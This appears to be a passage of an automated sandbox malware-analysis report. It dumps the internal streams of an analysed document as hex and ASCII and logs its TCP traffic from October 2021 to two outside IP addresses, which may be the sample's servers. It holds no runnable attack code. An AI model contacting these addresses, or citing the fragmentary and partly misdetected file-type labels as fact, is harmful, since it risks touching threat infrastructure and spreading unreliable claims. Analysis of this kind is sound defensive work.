                                                                                                    Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                                                    File Type:data
                                                                                                    Stream Size:2400
                                                                                                    Entropy:2.38528040219
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ( . ( . ( . . . . . . . / . / . / . 0 . 0 . 4 . 4 . 4 . 4 . 4 . 4 . : . : . : . B . B . B . B . B . R . R . V . V . V . V . V . V . V . V . e . e . j . j . j . j . j . j . j . j . x . x . x . y . y . y . z . z . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . & . # . * . , . # . * . , . # . * . , . . . 2 . * . 4 .
                                                                                                    Data Raw:06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 0b 00 0b 00 22 00 22 00 22 00 28 00 28 00 28 00 2e 00 2e 00 2e 00 2f 00 2f 00 2f 00 30 00 30 00 34 00 34 00 34 00 34 00 34 00 34 00 3a 00 3a 00 3a 00 42 00 42 00 42 00 42 00 42 00 52 00 52 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 56 00 65 00 65 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 78 00 78 00 78 00 79 00
                                                                                                    Stream Path: \x18496\x16778\x17207\x17522\x16925\x17915, File Type: data, Stream Size: 420
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16778\x17207\x17522\x16925\x17915
                                                                                                    File Type:data
                                                                                                    Stream Size:420
                                                                                                    Entropy:4.89796020484
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . & . ) . + . - . / . 1 . 3 . 5 . 7 . : . < . > . @ . B . D . E . G . J . L . N . Q . T . V . X . Z . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . $ . . . ' . * . , . . . 0 . 2 . 4 . 6 . 8 . ; . = . ? . A . C .
                                                                                                    Data Raw:b6 00 b8 00 b9 00 ba 00 bc 00 bf 00 c2 00 c5 00 c8 00 cb 00 cd 00 d0 00 d3 00 d6 00 d9 00 dc 00 df 00 e2 00 e4 00 e7 00 ea 00 ec 00 ef 00 f1 00 f4 00 f6 00 f9 00 fb 00 fe 00 00 01 03 01 06 01 09 01 0c 01 0e 01 11 01 14 01 17 01 19 01 1b 01 1e 01 20 01 23 01 25 01 26 01 29 01 2b 01 2d 01 2f 01 31 01 33 01 35 01 37 01 3a 01 3c 01 3e 01 40 01 42 01 44 01 45 01 47 01 4a 01 4c 01 4e 01
                                                                                                    Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                                    File Type:data
                                                                                                    Stream Size:48
                                                                                                    Entropy:3.31699618588
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . ^ . _ . . . . . . . . . . . . . . . . . . . . . . x . . . < . . . . .
                                                                                                    Data Raw:b6 00 b8 00 b9 00 ba 00 bc 00 bf 00 5e 01 5f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 78 85 a0 8f 3c 8f dc 85 c8 99
                                                                                                    Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 24
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                                                                    File Type:data
                                                                                                    Stream Size:24
                                                                                                    Entropy:2.80126936292
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . ` . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:b6 00 b8 00 b9 00 60 01 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 14 85
                                                                                                    Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 42
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                                    File Type:data
                                                                                                    Stream Size:42
                                                                                                    Entropy:3.09616118712
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . ^ . _ . . . . . . . . . . . . . . . . . . x . . . . . . . . .
                                                                                                    Data Raw:b6 00 b8 00 ba 00 c8 00 cb 00 5e 01 5f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 83 20 83 78 85 9c 98 00 99 dc 85 c8 99
                                                                                                    Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 4
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                                    File Type:data
                                                                                                    Stream Size:4
                                                                                                    Entropy:1.5
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . b .
                                                                                                    Data Raw:9a 01 62 01
                                                                                                    Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                                    File Type:data
                                                                                                    Stream Size:16
                                                                                                    Entropy:1.7947367178
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . .
                                                                                                    Data Raw:9a 01 00 00 00 00 00 00 02 80 01 80 00 00 00 80
                                                                                                    Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16918\x17191\x18468
                                                                                                    File Type:MIPSEB Ucode
                                                                                                    Stream Size:14
                                                                                                    Entropy:1.80735492206
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . .
                                                                                                    Data Raw:01 80 02 00 00 80 00 00 c6 01 00 00 00 00
                                                                                                    Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 12
                                                                                                    General
                                                                                                    Stream Path:\x18496\x16923\x17194\x17910\x18229
                                                                                                    File Type:data
                                                                                                    Stream Size:12
                                                                                                    Entropy:2.28415912785
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:e . . . . . e . . . b .
                                                                                                    Data Raw:65 01 01 80 c2 01 65 01 00 00 62 01
                                                                                                    Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 4
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17163\x16689\x18229
                                                                                                    File Type:data
                                                                                                    Stream Size:4
                                                                                                    Entropy:1.5
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:a . . .
                                                                                                    Data Raw:61 01 01 00
                                                                                                    Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 12
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                                    File Type:data
                                                                                                    Stream Size:12
                                                                                                    Entropy:2.28415912785
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:d . . . . . . . . . . .
                                                                                                    Data Raw:64 01 7f 01 7f 01 00 00 80 01 81 01
                                                                                                    Stream Path: \x18496\x17167\x16943, File Type: data, Stream Size: 40
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17167\x16943
                                                                                                    File Type:data
                                                                                                    Stream Size:40
                                                                                                    Entropy:3.32123018849
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . b . b . . . . . X ' . . , . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:9b 01 9f 01 62 01 62 01 9c 01 a0 01 58 27 01 81 2c be 01 80 9d 01 00 00 9e 01 00 00 00 82 00 82 01 00 00 80 02 00 00 80
                                                                                                    Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 168
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                                    File Type:data
                                                                                                    Stream Size:168
                                                                                                    Entropy:4.41170611669
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . G . ^ . _ . f . h . j . l . t . v . x . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . @ . . . p . . . . . ( . . . . . . . . . . . . . . . , . ( . ' . . . . . . .
                                                                                                    Data Raw:b6 00 b8 00 b9 00 ba 00 bc 00 c8 00 cb 00 ec 00 f6 00 fe 00 06 01 0c 01 14 01 17 01 20 01 33 01 47 01 5e 01 5f 01 66 01 68 01 6a 01 6c 01 74 01 76 01 78 01 7a 01 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 01 a4 01 00 00 00 00 a1 01 00 00 00 00 00 00 00 00 e8 83 20 83 84 83 78 85 a0 8f 9c 98 00 99 19 80
                                                                                                    Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 72
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                                                                    File Type:data
                                                                                                    Stream Size:72
                                                                                                    Entropy:3.74462013688
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . ` . p . r . t . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 1 . x . ( . ' . . .
                                                                                                    Data Raw:b6 00 b8 00 b9 00 dc 00 ec 00 f6 00 60 01 70 01 72 01 74 01 76 01 a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a1 01 00 00 00 00 e8 83 20 83 84 83 32 80 19 80 b0 84 14 85 31 80 78 85 28 80 27 80 bc 82
                                                                                                    Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: MIPSEL ECOFF executable not stripped, Stream Size: 12
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                                    File Type:MIPSEL ECOFF executable not stripped
                                                                                                    Stream Size:12
                                                                                                    Entropy:2.75162916739
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:b . c . d . . . . . e .
                                                                                                    Data Raw:62 01 63 01 64 01 04 81 00 00 65 01
                                                                                                    Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 16
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                                                                    File Type:data
                                                                                                    Stream Size:16
                                                                                                    Entropy:2.2717822216
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . .
                                                                                                    Data Raw:bf 01 00 00 be 01 00 00 01 05 00 80 00 00 c1 01
                                                                                                    Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 96
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17742\x17589\x18485
                                                                                                    File Type:data
                                                                                                    Stream Size:96
                                                                                                    Entropy:4.22938432612
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:00 80 01 80 02 80 04 80 05 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 82 01 83 01 84 01 85 01 86 01 87 01 88 01 89 01 8a 01 8b 01 8c 01 8d 01 8e 01 8f 01 90 01 91 01 92 01 93 01 94 01 95 01 96 01 97 01 98 01 99 01
                                                                                                    Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: Dyalog APL aplcore version 172.1, Stream Size: 48
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                                    File Type:Dyalog APL aplcore version 172.1
                                                                                                    Stream Size:48
                                                                                                    Entropy:3.41742239678
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:aa 00 ac 01 ae 01 b0 01 b2 01 b4 01 b6 01 b8 01 ba 01 bb 01 bd 01 c0 01 bf 01 ad 01 af 01 b1 01 b3 01 b5 01 b7 01 b9 01 9e 01 bc 01 be 01 c1 01
                                                                                                    Stream Path: \x18496\x17814\x15340\x17388\x15464\x17828\x18475, File Type: data, Stream Size: 20
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17814\x15340\x17388\x15464\x17828\x18475
                                                                                                    File Type:data
                                                                                                    Stream Size:20
                                                                                                    Entropy:4.12192809489
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:. . . . . . . . . > . L h [ . . [ . . .
                                                                                                    Data Raw:9f 01 00 80 91 ed 8d ec fb 3e 06 4c 68 5b 01 85 5b f6 c9 d0
                                                                                                    Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: MIPSEL MIPS-II ECOFF executable not stripped - version 1.124, Stream Size: 156
                                                                                                    General
                                                                                                    Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                                    File Type:MIPSEL MIPS-II ECOFF executable not stripped - version 1.124
                                                                                                    Stream Size:156
                                                                                                    Entropy:3.01256180589
                                                                                                    Base64 Encoded:False
                                                                                                    Data ASCII:f . h . j . l . n . p . r . t . v . x . z . | . ~ . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . a . a . a . a . a . a . a . a . a . a . g . i . k . m . o . q . s . u . w . y . { . } . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                    Data Raw:66 01 68 01 6a 01 6c 01 6e 01 70 01 72 01 74 01 76 01 78 01 7a 01 7c 01 7e 01 26 80 13 80 01 80 01 80 01 8d 01 80 01 80 01 80 01 80 01 80 01 80 01 8c 01 84 00 00 00 00 61 01 61 01 61 01 61 01 61 01 61 01 61 01 61 01 61 01 61 01 61 01 67 01 69 01 6b 01 6d 01 6f 01 71 01 73 01 75 01 77 01 79 01 7b 01 7d 01 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                    Network Behavior

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 4, 2021 21:28:19.361686945 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.361726046 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.361813068 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.397102118 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.397135973 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.729548931 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.732089996 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.732137918 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.733896017 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.733999014 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.739903927 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:19.740242004 CEST4434978164.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:19.740396023 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:20.627403975 CEST49781443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.309101105 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.309134960 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.309253931 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.312287092 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.312304020 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.637415886 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.637531042 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.752070904 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.752173901 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.752566099 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.753566027 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.756288052 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.799151897 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.969079018 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.969158888 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:28:36.969202042 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.969228029 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.970350981 CEST49785443192.168.2.464.15.159.234
                                                                                                    Oct 4, 2021 21:28:36.970388889 CEST4434978564.15.159.234192.168.2.4
                                                                                                    Oct 4, 2021 21:29:04.293517113 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:04.430963039 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:04.431092024 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:04.432180882 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:04.569446087 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:04.569555044 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:04.707633972 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:05.385082960 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:05.423033953 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:05.560446024 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:05.560564041 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:05.697840929 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:06.167964935 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:06.216263056 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:06.452752113 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:06.590441942 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:06.590507030 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:06.727756977 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:07.210020065 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:07.263173103 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:07.329655886 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:07.466995001 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:07.467072010 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:07.604770899 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:08.081867933 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:08.138242960 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:08.186345100 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:08.323959112 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:08.324075937 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:08.461338997 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:08.990792990 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:09.060195923 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:09.107904911 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:09.248066902 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:09.248209953 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:09.385632992 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:09.837187052 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:09.952002048 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:10.089310884 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:10.089791059 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:10.227199078 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:10.697573900 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:10.763494968 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:10.811733007 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:10.949124098 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:10.950357914 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:11.087743044 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:11.557856083 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:11.654844999 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:11.671711922 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:11.809129000 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:11.809216976 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:11.946587086 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:12.422461987 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:12.466787100 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:12.530153990 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:12.667566061 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:12.667643070 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:12.804968119 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:13.289611101 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:13.405601978 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:13.542969942 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:13.543076038 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:13.680350065 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:14.140866995 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:14.263796091 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:14.265013933 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:14.402848959 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:14.402928114 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:14.540324926 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:15.016509056 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:15.060746908 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:15.124874115 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:15.262197018 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:15.262264013 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:15.399538040 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:15.857896090 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:15.918051958 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:16.031827927 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:16.169265985 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:16.169367075 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:16.306657076 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:16.839771032 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:16.967112064 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:16.968343019 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:17.106153965 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:17.106232882 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:17.243566990 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:17.732819080 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:17.843523026 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:17.980962038 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:17.981070042 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:18.118690014 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:18.608513117 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:18.654800892 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:18.718620062 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:18.856504917 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:18.856591940 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:18.994334936 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:19.485305071 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:19.593441010 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:19.730802059 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:19.731014013 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:19.868274927 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:20.334800959 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:20.437061071 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:20.574357986 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:20.574450970 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:20.711819887 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:21.212836981 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:21.264391899 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:21.328093052 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:21.465415001 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:21.465522051 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:21.602814913 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:22.062762976 CEST8049816146.70.41.157192.168.2.4
                                                                                                    Oct 4, 2021 21:29:22.155591965 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:22.171713114 CEST4981680192.168.2.4146.70.41.157
                                                                                                    Oct 4, 2021 21:29:22.309081078 CEST8049816146.70.41.157192.168.2.4
